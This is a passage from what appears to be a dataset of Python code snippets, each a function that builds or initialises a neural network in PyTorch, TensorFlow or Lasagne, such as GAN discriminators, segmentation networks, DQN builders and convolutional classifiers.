self).__init__()\n n_in = IMG_CHANNELS\n n_out = 1\n\n feature_map = IMG_SIZE\n kernel_size = 4\n stride = 2\n padding = 1\n bias = False\n\n self.num_gpus = num_gpus\n\n self.network = nn.Sequential(\n # input is image\n nn.Conv2d(n_in, feature_map, kernel_size, stride, padding, bias=bias),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = feature_map * 2\n nn.Conv2d(feature_map, feature_map * 2, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 2),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = feature_map * 4\n nn.Conv2d(feature_map * 2, feature_map * 4, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 4),\n 
nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = feature_map * 8\n nn.Conv2d(feature_map * 4, feature_map * 8, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 8),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = 1\n nn.Conv2d(feature_map * 8, n_out, kernel_size, 1, 0, bias=bias),\n nn.Sigmoid()\n )", "def __init__(self, n_classes=1, n_channel=3):\n\n super(InstanceSegNet, self).__init__()\n\n self.conv1 = nn.Conv1d(n_channel, 64, 1)\n self.conv2 = nn.Conv1d(64, 64, 1)\n self.conv3 = nn.Conv1d(64, 64, 1)\n self.conv4 = nn.Conv1d(64, 128, 1)\n self.conv5 = nn.Conv1d(128, 1024, 1)\n\n self.conv6 = nn.Conv1d(1088 + n_classes, 512, 1) # shape: (1024+64, 512, 1)\n self.conv7 = nn.Conv1d(512, 256, 1)\n self.conv8 = nn.Conv1d(256, 128, 1)\n self.conv9 = nn.Conv1d(128, 128, 1)\n self.conv10 = nn.Conv1d(128, 2, 1)\n\n self.dropout = nn.Dropout(p=0.5)\n\n self.bn1 = nn.BatchNorm1d(64)\n self.bn1 = nn.BatchNorm1d(64)\n self.bn2 = nn.BatchNorm1d(64)\n self.bn3 = nn.BatchNorm1d(64)\n self.bn4 = nn.BatchNorm1d(128)\n self.bn5 = nn.BatchNorm1d(1024)\n self.bn6 = nn.BatchNorm1d(512)\n self.bn7 = nn.BatchNorm1d(256)\n self.bn8 = nn.BatchNorm1d(128)\n self.bn9 = nn.BatchNorm1d(128)", "def __init__(self):\n\n super(LocalDiscriminator, self).__init__()\n\n # input image will have the size of 128x128x3\n self.first_conv_layer = TransitionDown(in_channels=3, out_channels=32, kernel_size=5)\n self.second_conv_layer = TransitionDown(in_channels=32, out_channels=64, kernel_size=5)\n self.third_conv_layer = TransitionDown(in_channels=64, out_channels=128, kernel_size=5)\n self.fourth_conv_layer = TransitionDown(in_channels=128, out_channels=32, kernel_size=5)\n self.fifth_conv_layer = TransitionDown(in_channels=32, out_channels=1, kernel_size=5)\n \n '''\n self.fc1 = nn.Linear(4 * 4 * 512, 10)\n self.fc2 = nn.Linear(10, 1)\n\n torch.nn.init.xavier_uniform(self.fc1.weight)\n torch.nn.init.xavier_uniform(self.fc2.weight)\n '''", "def cnnModel3(features, labels, mode):\n \n dconv = True\n sz = 50\n n_dimensions = 13\n #n_dimensions = int(features[\"x\"].get_shape().as_list()[1]/(sz**2))\n print(\"MODE=%s\\nInput Dimensions=%s\"%(mode,n_dimensions))\n ks1 = [10,10]\n ks2 = [10,10]\n ks3 = [10,10]\n fs1 = 32\n fs2 = 64\n fs3 = 2\n \n # Input Layer\n input_layer = tf.reshape(features[\"x\"], [-1, sz, sz, n_dimensions])\n \n dropOut_layer = tf.layers.dropout(input_layer,rate=0.5)\n \n #print(input_layer.shape)\n \n # Convolutional Layer #1\n conv1 = tf.layers.conv2d(\n inputs=dropOut_layer,\n filters=fs1,\n kernel_size=ks1,\n padding=\"same\",\n activation=tf.nn.leaky_relu,\n name=\"conv1\")\n pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)\n # Convolutional Layer #2 and Pooling Layer #2\n conv2 = tf.layers.conv2d(\n inputs=pool1,\n filters=fs2,\n kernel_size=ks2,\n padding=\"same\",\n activation=tf.nn.leaky_relu,\n name=\"conv2\")\n pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)\n \n pool2flat = tf.reshape(pool2,[-1,pool2.shape[1]*pool2.shape[2]*pool2.shape[3]])\n \n if dconv:\n dense1 = tf.layers.dense(inputs=pool2flat, units=int(sz*sz*2), activation=tf.nn.leaky_relu)\n dense1_rs = tf.reshape(dense1,[-1,sz,sz,2])\n dconv1 = tf.layers.conv2d_transpose(\n inputs=dense1_rs,filters=fs3,\n kernel_size=ks3,\n padding=\"same\",\n activation=tf.nn.leaky_relu,\n name=\"dconv1\")\n dconv1flat = tf.reshape(dconv1,[-1,dconv1.shape[1]*dconv1.shape[2]*dconv1.shape[3]])\n denseOut = tf.layers.dense(inputs=dconv1flat, units=int(sz*sz*2), 
activation=tf.nn.tanh)\n print(\"Input Layer Dimensions:\\t\",input_layer.shape)\n print(\"Dropout Layer Dimensions:\\t\",dropOut_layer.shape)\n print(\"First Conv Layer Dim:\\t\",conv1.shape)\n print(\"First Pool Layer Dim:\\t\",pool1.shape)\n print(\"Second Conv Layer Dim:\\t\", conv2.shape)\n print(\"Second Pool Layer Dim:\\t\", pool2.shape)\n print(\"Classify Layer Dim:\\t\", dense1.shape)\n print(\"Deconv Layer Dim:\\t\", dconv1.shape)\n print(\"Output Layer Dim:\\t\",denseOut.shape)\n else:\n denseOut = tf.layers.dense(inputs=pool2flat, units=int(sz*sz*2), activation=tf.nn.tanh)\n \n logits = tf.reshape(denseOut,[-1,int(sz*sz*2)])\n predicted_classes = tf.argmax(input=tf.reshape(dense1,[-1,int(sz*sz),2]), axis=2)\n \n if mode == tf.estimator.ModeKeys.PREDICT:\n predictions = {\n 'class_ids': predicted_classes,#[:, tf.newaxis],\n 'probabilities': tf.nn.softmax(logits),\n 'logits': logits,\n }\n return tf.estimator.EstimatorSpec(mode, predictions=predictions)\n \n loss = tf.reduce_sum(abs(tf.cast(labels,tf.float32)-tf.cast(logits,tf.float32))**2)**0.5\n\n label_rs = tf.reshape(labels,[-1,int(sz*sz),2])\n label_classes = tf.argmax(input=label_rs,axis=2)\n accuracy = tf.metrics.accuracy(labels=label_classes,predictions=predicted_classes,name='acc_op')\n metrics = {'accuracy': accuracy}\n tf.summary.scalar('accuracy', accuracy[1])\n\n if mode == tf.estimator.ModeKeys.EVAL:\n return tf.estimator.EstimatorSpec(mode,loss=loss,eval_metric_ops=metrics)\n \n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=10**-4)\n train_op = optimizer.minimize(loss, global_step=tf.train.get_global_step())\n return tf.estimator.EstimatorSpec(mode, loss=loss, train_op=train_op)", "def forward(self, x): \n # Layer 1\n x = F.elu(self.conv1(x)) # bsize x l1_channels x 1 x Nsamples\n x = self.batchnorm1(x)\n x = F.dropout(x, 0.25)\n x = x.permute(0, 2, 1, 3) # bsize x 1 x l1_channels x Nsamples\n\n # Layer 2\n x = self.padding1(x)\n x = F.elu(self.conv2(x)) # bsize x l2_channels x l1_channels x Nsamples\n x = self.batchnorm2(x) \n x = F.dropout(x, 0.25)\n x = self.pooling2(x) # bsize x l2_channels x floor(l1_channels/2) x floor(Nsamples/4)\n\n # Layer 3\n x = self.padding2(x)\n x = F.elu(self.conv3(x)) # bsize x l3_channels x floor(l1_channels/2) x floor(Nsamples/4)\n x = self.batchnorm3(x)\n x = F.dropout(x, 0.25)\n x = self.pooling3(x) # bsize x l3_channels x floor(l1_channels/4) x floor(Nsamples/16)\n\n # Fully-connected Layer\n x = x.view(-1, self.fc1.in_features) # bsize x (l3_channels*floor(l1_channels/4)*floor(Nsamples/16))\n x = F.sigmoid(self.fc1(x)) # bisze x self.fc1.out_features \n \n if self.fc1.out_features == 1:\n x = x.view(-1) # bsize (1D if 1 output unit)\n \n return x", "def initialize_network(self):\n # intermediate layer size\n ils = int((self.specbinnum + self.numfilters) / 2)\n\n network = lasagne.layers.InputLayer((None, 1, self.specbinnum, self.numtimebins), self.input_var)\n\n network = NormalisationLayer(network, self.specbinnum)\n self.normlayer = network\n\n network, _ = custom_convlayer_2(network, in_num_chans=self.specbinnum, out_num_chans=ils)\n network = batch_norm(network)\n network, _ = custom_convlayer_2(network, in_num_chans=ils, out_num_chans=self.numfilters)\n network = batch_norm(network)\n\n network = lasagne.layers.NonlinearityLayer(network, nonlinearity=elu)\n self.latents = network\n network = ZeroOutBackgroundLatentsLayer(self.latents,\n mp_down_factor=self.mp_down_factor,\n numfilters=self.numfilters,\n 
numtimebins=self.numtimebins,\n                                                 background_latents_factor=self.background_latents_factor,\n                                                 use_maxpool=self.use_maxpool)\n        network, _ = custom_convlayer_2(network, in_num_chans=self.numfilters, out_num_chans=ils)\n        network = batch_norm(network)\n        network, _ = custom_convlayer_2(network, in_num_chans=ils, out_num_chans=self.specbinnum)\n        network = batch_norm(network)\n\n        # output_size\n        num_time_samples = int(audioframe_len/2 * (self.numtimebins + 1))\n        # network = batch_norm(DenseLayer(network, num_time_samples)) # MemoryError\n        network, _ = custom_convlayer_2(network, in_num_chans=self.specbinnum, out_num_chans=num_time_samples)\n        network = batch_norm(network)\n        network, _ = custom_convlayer_2(network, in_num_chans=num_time_samples, out_num_chans=1)\n        network = batch_norm(network)\n\n        self.network = network", "def build_dc_classifier():\n    # return nn.Sequential(\n    #     Unflatten(Batch_size, 1, 28, 28),\n    #     nn.Conv2d(1, 32, kernel_size=5, stride=1),\n    #     nn.LeakyReLU(negative_slope=0.01),\n    #     nn.MaxPool2d(2, stride=2),\n    #     nn.Conv2d(32, 64, kernel_size=5, stride=1),\n    #     nn.LeakyReLU(negative_slope=0.01),\n    #     nn.MaxPool2d(kernel_size=2, stride=2),\n    #     Flatten(),\n    #     nn.Linear(4 * 4 * 64, 4 * 4 * 64),\n    #     nn.LeakyReLU(negative_slope=0.01),\n    #     nn.Linear(4 * 4 * 64, 1)\n    # )\n\n    return nn.Sequential(\n        Unflatten(Batch_size, 1, 128, 128), #28,28,32 #128,128,16\n        nn.Conv2d(1, 16,kernel_size=5, stride=1), #24,24,32 #124,124,16\n        nn.LeakyReLU(negative_slope=0.01),\n        nn.MaxPool2d(2, stride=2), #12,12,32 #62,62,16\n        nn.Conv2d(16, 32,kernel_size=5, stride=1), # 8, 8,64 #58,58,32\n        nn.LeakyReLU(negative_slope=0.01),\n        nn.MaxPool2d(kernel_size=2, stride=2), # 4, 4,64 #29,29,32\n        nn.Conv2d(32, 64, kernel_size=5, stride=1), #25,25,64\n        nn.LeakyReLU(negative_slope=0.01),\n        nn.MaxPool2d(kernel_size=2, stride=2), #12,12,64\n        nn.Conv2d(64, 128, kernel_size=5, stride=1), # 8, 8,128\n        nn.LeakyReLU(negative_slope=0.01),\n        nn.MaxPool2d(kernel_size=2, stride=2), # 4, 4,128\n        Flatten(),\n        nn.Linear(4*4*128, 4*4*128), # 4*4*64 # 4*4*128\n        nn.LeakyReLU(negative_slope=0.01),\n        nn.Linear(4*4*128,1) # 4*4*64 # 4*4*128\n    )", "def _build_network(self):\n        self.new_trainable_variable(\"w0_sin\", np.zeros(\n            (config.somites * 2 - 2, HIDDEN_LAYER_UNITS), dtype=np.float64))\n        self.new_trainable_variable(\"b0_sin\", np.zeros(HIDDEN_LAYER_UNITS, dtype=np.float64))\n        self.new_trainable_variable(\"w1_sin\", np.zeros(\n            (HIDDEN_LAYER_UNITS, config.oscillators), dtype=np.float64))\n        self.new_trainable_variable(\"b1_sin\", np.zeros(config.oscillators, dtype=np.float64))\n\n        self.new_trainable_variable(\"w0_cos\", np.zeros(\n            (config.somites * 2 - 2, HIDDEN_LAYER_UNITS), dtype=np.float64))\n        self.new_trainable_variable(\"b0_cos\", np.zeros(HIDDEN_LAYER_UNITS, dtype=np.float64))\n        self.new_trainable_variable(\"w1_cos\", np.zeros(\n            (HIDDEN_LAYER_UNITS, config.oscillators), dtype=np.float64))\n        self.new_trainable_variable(\"b1_cos\", np.zeros(config.oscillators, dtype=np.float64))\n\n        def action_infer(state: np.array) -> np.array:\n            \"\"\"\n            Get state and return feedback.\n\n            state: [f_0, f_1, ..., phi_0, phi_1, ..., t_0, t_1, ...]\n            return: [phase_feedback0, phase_feedback1, ..., angle_range0, angle_range1, ...]\n\n            Discrepancy for torsion spring = alpha / 2 * k * range * T * sin(phi_i)\n            \"\"\"\n            forces = state[:config.somites]\n            phis = state[config.somites:config.somites + config.oscillators]\n            tensions = state[config.somites + config.oscillators:]\n\n            f_sin, f_cos = self._calc_fs(np.concatenate((forces, tensions)))\n            
discrepancies = -0.5 * config.caterpillar_params[\"vertical_ts_k\"] * config.caterpillar_params[\"realtime_tunable_ts_rom\"] * tensions * np.sin(phis)\n return f_sin * np.sin(phis) + f_cos * np.cos(phis) - self.get_discrep_coeffs() * discrepancies, np.ones(config.oscillators) * config.caterpillar_params[\"realtime_tunable_ts_rom\"]\n\n return action_infer", "def __init__(self):\n\n super(GlobalDiscriminator, self).__init__()\n\n # input image will have the size of 64x64x3\n self.first_conv_layer = TransitionDown(in_channels=3, out_channels=32, kernel_size=5)\n self.second_conv_layer = TransitionDown(in_channels=32, out_channels=32, kernel_size=5)\n self.third_conv_layer = TransitionDown(in_channels=32, out_channels=64, kernel_size=5)\n self.fourth_conv_layer = TransitionDown(in_channels=64, out_channels=64, kernel_size=5)\n\n self.fc1 = nn.Linear(5 * 5 * 64, 1)\n\n torch.nn.init.xavier_uniform(self.fc1.weight)", "def _build_networks(self):\n self.online_convnet = self._create_network(name='Online')\n self.target_convnet = self._create_network(name='Target')\n self._net_outputs = self.online_convnet(self.state_ph, training=True)\n self._q_argmax = tf.argmax(self._net_outputs.q_values, axis=1)[0]\n self._replay_net_outputs = self.online_convnet(self._replay.states,\n training=True)\n self._replay_next_target_net_outputs = self.target_convnet(\n self._replay.next_states)", "def get_network(x):\n n_classes = 5\n batch_size = x.get_shape().as_list()[0]\n channels = x.get_shape().as_list()[3]\n \n # split channels to process separately\n c1, c2, c3, c4 = tf.split(3, channels, x)\n \n # Model Helpers --------------------------------------------------------\n\n # https://www.tensorflow.org/versions/r0.8/api_docs/python/nn.html#conv2d\n def conv2d(img, w, b):\n \n x = tf.nn.conv2d(img, w, strides=[1, 1, 1, 1], padding='VALID')\n z = tf.nn.bias_add(x, b)\n return tf.nn.relu(z)\n\n # https://www.tensorflow.org/versions/r0.8/api_docs/python/nn.html#max_pool\n def max_pool(img, k):\n ks = [1, k, k, 1]\n return tf.nn.max_pool(img, ksize=ks, strides=ks, padding='VALID')\n\n # TODO implement\n def maxout(x):\n raise NotImplemented()\n\n def fc(x, w, b, act):\n return act(tf.add(tf.matmul(x, w), b))\n\n def conv_net(_x):\n # First convolution layer\n #print 'x: {}'.format(_X.get_shape())\n weights = {\n # 6x6 conv, 3-channel input, 32-channel outputs\n 'wc1': tf.Variable(tf.truncated_normal([10, 10, 1, 32], stddev=0.01)),\n # 5x5 conv, 32-channel inputs, 64-channel outputs\n 'wc2': tf.Variable(tf.truncated_normal([7, 7, 32, 64], stddev=0.01)),\n # 3x3 conv, 64-channel inputs, 128-channel outputs\n 'wc3': tf.Variable(tf.truncated_normal([3, 3, 64, 128], stddev=0.01)),\n # 3x3 conv, 128-channel inputs, 128-channel outputs\n 'wc4': tf.Variable(tf.truncated_normal([3, 3, 128, 128], stddev=0.1)),\n }\n \n biases = {\n 'bc1': tf.Variable(tf.constant(0.1, shape=[32])),\n 'bc2': tf.Variable(tf.constant(0.1, shape=[64])),\n 'bc3': tf.Variable(tf.constant(0.1, shape=[128])),\n 'bc4': tf.Variable(tf.constant(0.1, shape=[128])),\n } \n \n \n conv1 = conv2d(_x, weights['wc1'], biases['bc1'])\n # k used to be 2\n conv1 = max_pool(conv1, k=4)\n\n #print 'conv1: {}'.format(conv1.get_shape())\n\n # Second Covolution layer\n conv2 = conv2d(conv1, weights['wc2'], biases['bc2'])\n conv2 = max_pool(conv2, k=2)\n\n # Thrid Convolution Layer\n conv3 = conv2d(conv2, weights['wc3'], biases['bc3'])\n\n #print 'conv3: {}'.format(conv3.get_shape())\n\n # Fourth Convolution Layer\n conv4 = conv2d(conv3, weights['wc4'], 
biases['bc4'])\n conv4 = max_pool(conv4, k=2)\n\n return tf.reshape(conv4, [batch_size, -1])\n\n \n fc_weights = {\n 'wf1': tf.Variable(tf.truncated_normal([512, 2048], stddev=0.001)),\n # fully coneected 2048 inputs, 2048 outputs\n 'wf2': tf.Variable(tf.truncated_normal([2048, 2048], stddev=0.001)),\n # 2048 inputs, 5 outputs (class prediction)\n 'out': tf.Variable(tf.truncated_normal([2048, n_classes], stddev=0.01))\n }\n \n fc_biases = {\n 'bf1': tf.Variable(tf.constant(0.01, shape=[2048])),\n 'bf2': tf.Variable(tf.constant(0.01, shape=[2048])),\n 'out': tf.Variable(tf.constant(0.1, shape=[n_classes]))\n }\n\n c1 = conv_net(c1)\n c2 = conv_net(c2)\n c3 = conv_net(c3)\n c4 = conv_net(c4)\n \n # feed this into one fully connected layer\n cmb = tf.concat(1, [c1,c2,c3,c4]) \n \n # fully connected\n fc1 = fc(cmb, fc_weights['wf1'], fc_biases['bf1'], tf.nn.relu)\n fc2 = fc(fc1, fc_weights['wf2'], fc_biases['bf2'], tf.nn.relu)\n \n # output\n output = fc(fc2, fc_weights['out'], fc_biases['out'], tf.nn.softmax)\n \n return output", "def _build_networks(self):\n # Calling online_convnet will generate a new graph as defined in\n # self._get_network_template using whatever input is passed, but will always\n # share the same weights.\n self.online_convnet = tf.make_template('Online', self._network_template)\n self.target_convnet = tf.make_template('Target', self._network_template)\n self._net_outputs = self.online_convnet(self.state_ph)\n\n self._replay_net_outputs = self.online_convnet(self._replay.states)\n self._replay_next_target_net_outputs = self.target_convnet(\n self._replay.next_states)\n\n if self.acting_policy == 'hyperbolic':\n self._q_argmax = tf.argmax(self._net_outputs.hyp_q_value, axis=1)[0]\n elif self.acting_policy == 'largest_gamma':\n self._q_argmax = tf.argmax(self._net_outputs.q_values[-1], axis=1)[0]\n else:\n raise NotImplementedError", "def __init__(self, in_channels=3, n_classes=21):\n super(SegNet_1, self).__init__()\n\n self.layer_1 = SegnetLayer_Encoder(in_channels, 64, 2)\n self.layer_2 = SegnetLayer_Encoder(64, 128, 2)\n self.layer_3 = SegnetLayer_Encoder(128, 256, 3)\n self.layer_4 = SegnetLayer_Encoder(256, 512, 3)\n self.layer_5 = SegnetLayer_Encoder(512, 1024, 3)\n self.layer_6 = SegnetLayer_Encoder(1024, 1024, 3)\n\n self.layer_7 = SegnetLayer_Decoder(1024, 1024, 3)\n self.layer_8 = SegnetLayer_Decoder(1024, 512, 3)\n self.layer_9 = SegnetLayer_Decoder(512, 256, 3)\n self.layer_10 = SegnetLayer_Decoder(256, 128, 3)\n self.layer_11 = SegnetLayer_Decoder(128, 64, 2)\n self.layer_12 = SegnetLayer_Decoder(64, n_classes, 2)", "def __init__(self, n_latent_features=1024, reduced_size=64, activation=ReLU()):\n\n super().__init__()\n self.logger = logging.getLogger(AutoEncoderConvolutional.__name__)\n self.n_latent_features = n_latent_features\n self.reduced_size = reduced_size\n self.middle_layer_size = int(16 * self.reduced_size / 4 * self.reduced_size / 4)\n self.activation = activation\n\n self.logger.info(\"Construct model..\")\n self.encode_conv1 = nn.Conv2d(3, 6, kernel_size=3, padding=1)\n self.encode_pool1 = nn.MaxPool2d(2, stride=2)\n self.encode_conv2 = nn.Conv2d(6, 16, kernel_size=3, padding=1)\n self.encode_pool2 = nn.MaxPool2d(2, stride=2)\n self.encode_fc = nn.Linear(self.middle_layer_size, self.n_latent_features)\n\n self.decode_fc = nn.Linear(self.n_latent_features, self.middle_layer_size)\n self.decode_conv1 = nn.ConvTranspose2d(16, 6, kernel_size=2, stride=2)\n self.decode_conv2 = nn.ConvTranspose2d(6, 3, kernel_size=2, stride=2)\n\n 
self.reset_weights()\n\n self.logger.info(\"Finished instantiation\")", "def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d):\n super(NLayerDiscriminator, self).__init__()\n use_bias = True\n\n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n self.model = nn.Sequential(*sequence)", "def __init__(self, input_dim=(3, 32, 32), num_filters=32, filter_size=7,\n hidden_dim=100, num_classes=10, weight_scale=1e-3, reg=0.0,\n dtype=np.float32):\n self.params = {}\n self.reg = reg\n self.dtype = dtype\n \n ############################################################################\n # TODO: Initialize weights and biases for the three-layer convolutional #\n # network. Weights should be initialized from a Gaussian with standard #\n # deviation equal to weight_scale; biases should be initialized to zero. #\n # All weights and biases should be stored in the dictionary self.params. #\n ############################################################################\n \n # Store weights and biases for the convolutional layer using the keys 'W1' and 'b1'; \n C, H, W = input_dim\n filter_sizes = (filter_size, filter_size)\n self.params['W1'] = np.random.normal(0, weight_scale, [num_filters, C, filter_sizes[0], filter_sizes[1]])\n self.params['b1'] = np.zeros((num_filters, ))\n\n # use keys 'W2' and 'b2' for the weights and biases of the hidden affine layer;\n # In this case, ConvLayer doesn't reduce the spatial size of the input, (N, C, H, W) -> Conv -> (N, F, H, W)\n # To satisfy this constraint, (W + 2 * pad - filter_size) / stride + 1 = W need to hold, which led to pad = (F - S) / 2 where S == 1\n # (N, C, H, W) -> Conv -> (N, F, H, W) -> Pooling -> (N, F, H/2, W/2)\n # In a FC_NN, FCL weights (input_dim, hidden_dim) where every img is flatten into a 1D array of length D = F * H/2 * W/2.\n self.params['W2'] = np.random.normal(0, weight_scale, [num_filters * (H / 2) * (W / 2), hidden_dim])\n self.params['b2'] = np.zeros((hidden_dim, ))\n\n # And the keys 'W3' and 'b3' for the weights and biases of the output affine layer. 
\n self.params['W3'] = np.random.normal(0, weight_scale, [hidden_dim, num_classes])\n self.params['b3'] = np.zeros((num_classes, ))\n\n \n ############################################################################\n # END OF YOUR CODE #\n ############################################################################\n\n for k, v in self.params.iteritems():\n self.params[k] = v.astype(dtype)", "def build_neuron_network(nb_features_map: Union[Sequence[int], None] = None,\n size_linear_layers: Union[Sequence[int], None] = None,\n dropout_rate: Union[Tuple[float, float], float] = 0.3,\n conv_kernel_size: Union[Sequence[int], int] = 3,\n conv_stride: int = 1,\n conv_padding: int = 1,\n conv_activation: str = \"relu\",\n conv_architecture: str = \"CPD\",\n pool_kernel_size: int = 2,\n pool_stride: int = 2,\n dense_activation: str = \"relu\",\n pretrained: Union[str, None] = None,\n grayscale: bool = True,\n optimizer: str = \"Adam\",\n weight_decay: float = 0.,\n learning_rate: float = 0.001,\n ) -> Tuple[nn.Module, List, torch.optim.Optimizer]:\n # Initializations\n if pretrained is not None:\n grayscale = False\n if grayscale:\n channels = 1\n else:\n channels = 3\n if nb_features_map is None:\n nb_features_map = [8]\n if size_linear_layers is None:\n size_linear_layers = []\n height = 224\n width = 224\n module = nn.Module()\n shapes = [(\"input\", channels, height, width)]\n layers = {\"extractor\": [], \"regressor\": []}\n if not hasattr(dropout_rate, \"__len__\"):\n dropout_rate = (dropout_rate, 0.)\n next_dropout_rate = dropout_rate[0]\n # If a pretrained model is used:\n if pretrained is None:\n # Input checks\n if hasattr(conv_kernel_size, \"__len__\"):\n if len(conv_kernel_size) != len(nb_features_map):\n raise ValueError(\"The length of nb_features_map shall match the length of conv_kernel_size\")\n else:\n conv_kernel_size = [conv_kernel_size] * len(nb_features_map)\n # Feature extractor\n next_layer_type = itertools.cycle(conv_architecture)\n nb_feature_map = None\n i = 0\n while True:\n layer_type = next(next_layer_type)\n if layer_type == \"C\":\n # Convolutional layer\n try:\n nb_feature_map = nb_features_map[i]\n except IndexError:\n break\n name = \"conv2d-{:02d}\".format(i+1)\n conv = nn.Conv2d(shapes[-1][1], nb_feature_map, conv_kernel_size[i], stride=conv_stride,\n padding=conv_padding)\n layers[\"extractor\"].append((name, conv))\n h, w = output_shape_conv_and_pool_layer(rows=shapes[-1][2], columns=shapes[-1][3],\n kernel=conv_kernel_size[i], stride=conv_stride,\n padding=conv_padding)\n shapes.append((name, nb_feature_map, h, w))\n i += 1\n # Activation\n if conv_activation == \"relu\":\n activ = nn.ReLU()\n elif conv_activation == \"elu\":\n activ = nn.ELU(alpha=0.1)\n elif conv_activation == \"leaky\":\n activ = nn.LeakyReLU()\n else:\n activ = nn.ReLU()\n name = \"{}-{:02d}\".format(conv_activation, i)\n layers[\"extractor\"].append((name, activ))\n # activation does not change the size\n shapes.append((name, shapes[-1][1], shapes[-1][2], shapes[-1][3]))\n elif layer_type == \"P\":\n # Max-pooling\n name = \"maxpool2d-{:02d}\".format(i)\n pool = nn.MaxPool2d(pool_kernel_size, pool_stride)\n layers[\"extractor\"].append((name, pool))\n h, w = output_shape_conv_and_pool_layer(rows=shapes[-1][2], columns=shapes[-1][3],\n kernel=pool_kernel_size, stride=pool_stride)\n shapes.append((name, nb_feature_map, h, w))\n elif layer_type == \"D\":\n # Dropout\n if next_dropout_rate > 0.:\n name = \"dropout-{:02d}\".format(i)\n dropout = nn.Dropout(p=next_dropout_rate)\n 
layers[\"extractor\"].append((name, dropout))\n # Dropout does not change the size\n shapes.append((name, shapes[-1][1], shapes[-1][2], shapes[-1][3]))\n next_dropout_rate += dropout_rate[1]\n elif layer_type == \"B\":\n # Batch normalization\n name = \"batchnorm-{:02d}\".format(i)\n batch = nn.BatchNorm2d(shapes[-1][1])\n layers[\"extractor\"].append((name, batch))\n # Batch norm. does not change the size\n shapes.append((name, shapes[-1][1], shapes[-1][2], shapes[-1][3]))\n # Add a flatten layer\n name = \"flatten\"\n flatten = nn.Flatten(1)\n layers[\"extractor\"].append((name, flatten))\n shapes.append((name, shapes[-1][1] * shapes[-1][2] * shapes[-1][3]))\n # Create extractor module\n extractor = nn.Sequential(OrderedDict(layers[\"extractor\"]))\n module.add_module(\"extractor\", extractor)\n elif pretrained == \"VGG16\":\n pre_trained = models.vgg16(pretrained=True)\n modules = []\n for _name, _module in pre_trained.named_children():\n if _name != 'classifier':\n modules.append((_name, _module))\n modules.append((\"flatten\", nn.Flatten(1)))\n vgg16 = nn.Sequential(OrderedDict(modules))\n # Freeze all parameters in the pre-trained model\n # So we prevent gradients from being calculated, it will save computation time\n for param in vgg16.parameters():\n param.requires_grad = False\n module.add_module('extractor', vgg16)\n shapes.append((pretrained, 25088))\n else:\n raise ValueError(f\"Unknown pre-trained model '{pretrained}'.\")\n # Regressor\n for i, size_linear_layer in enumerate(size_linear_layers):\n # Add a linear layer\n name = \"linear-{:02d}\".format(i + 1)\n linear = nn.Linear(shapes[-1][1], size_linear_layer)\n layers[\"regressor\"].append((name, linear))\n shapes.append((name, size_linear_layer))\n # Activation\n if dense_activation == \"relu\":\n activ = nn.ReLU()\n elif dense_activation == \"elu\":\n activ = nn.ELU(alpha=0.1)\n elif dense_activation == \"leaky\":\n activ = nn.LeakyReLU()\n else:\n activ = nn.ReLU()\n name = \"{}-{:02d}\".format(dense_activation, i + 1)\n layers[\"regressor\"].append((name, activ))\n shapes.append((name, shapes[-1][1])) # activation does not change the size\n # Dropout\n if next_dropout_rate > 0.:\n name = \"dropout-{:02d}\".format(i + 1)\n dropout = nn.Dropout(p=next_dropout_rate)\n layers[\"regressor\"].append((name, dropout))\n shapes.append((name, shapes[-1][1])) # Dropout does not change the size of array\n next_dropout_rate += dropout_rate[1]\n # Add the final layer, the output size is fixed to 68 x 2 = 136\n name = \"output\"\n linear = nn.Linear(shapes[-1][1], 136)\n layers[\"regressor\"].append((name, linear))\n shapes.append((name, 136))\n # Create regressor module\n regressor = nn.Sequential(OrderedDict(layers[\"regressor\"]))\n module.add_module(\"regressor\", regressor)\n # Weight initialization\n module.apply(weight_initialization)\n # Optimizer\n if optimizer == \"Adam\":\n optim = torch.optim.Adam(module.parameters(), lr=learning_rate, weight_decay=weight_decay)\n elif optimizer == \"AdamW\":\n optim = torch.optim.AdamW(module.parameters(), lr=learning_rate, weight_decay=weight_decay)\n elif optimizer == \"SGD\":\n optim = torch.optim.SGD(module.parameters(), lr=learning_rate, weight_decay=weight_decay, momentum=0.9)\n else:\n raise ValueError(f\"Unknown optimizer {optimizer}.\")\n return module, shapes, optim", "def _build_networks(self):\n self.online_convnet = self._create_network(name='Online')\n self.target_convnet = self._create_network(name='Target')\n\n # Compute the Q-values which are used for action selection in 
